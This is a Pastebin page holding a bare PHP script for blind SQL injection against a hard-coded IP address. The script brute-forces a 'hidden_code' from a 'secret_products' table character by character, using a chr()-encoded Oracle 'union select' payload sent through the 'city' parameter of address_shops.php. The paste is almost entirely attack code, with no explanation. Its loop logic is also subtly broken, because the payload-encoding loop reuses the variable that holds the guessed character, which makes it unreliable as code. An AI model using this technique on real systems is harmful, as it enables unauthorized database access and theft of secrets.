SHARE
TWEET

Untitled

a guest Jan 27th, 2014 117 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. for($i=0;$i<32;$i++){
  2. for($j=49;$j<126;++$j) {
  3.  
  4.     $query = "' union select 1 from secret_products where hidden_code like '".$pwd.chr($j)."%'-- -";
  5.     $payload = '';
  6.     for($j = 0; $j < strlen($query) - 1; ++$j)
  7.         $payload .= 'chr('.ord($query[$j]) . ')||';
  8.     $payload .= 'chr('.ord($query[strlen($query) - 1]) . ')';
  9.     $s=file_get_contents("http://195.133.87.173/address_shops.php?city=''+union+select+rawtohex(PHD_IV_OWNER2.shop_private_pkg.get_product_quantity(".$payload."))+as+address+from+dual+--+-", false, $c);
  10.         if(preg_match('/<tr>C102/', $s) && chr($j)!='%'&& chr($j)!='_'){
  11.                 $pwd.=chr($j);
  12.                 echo $pwd."\n";
  13.                 break;
  14.         }
  15. }
  16. if($j==126){
  17.         $pwd.="_";
  18. }
  19. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top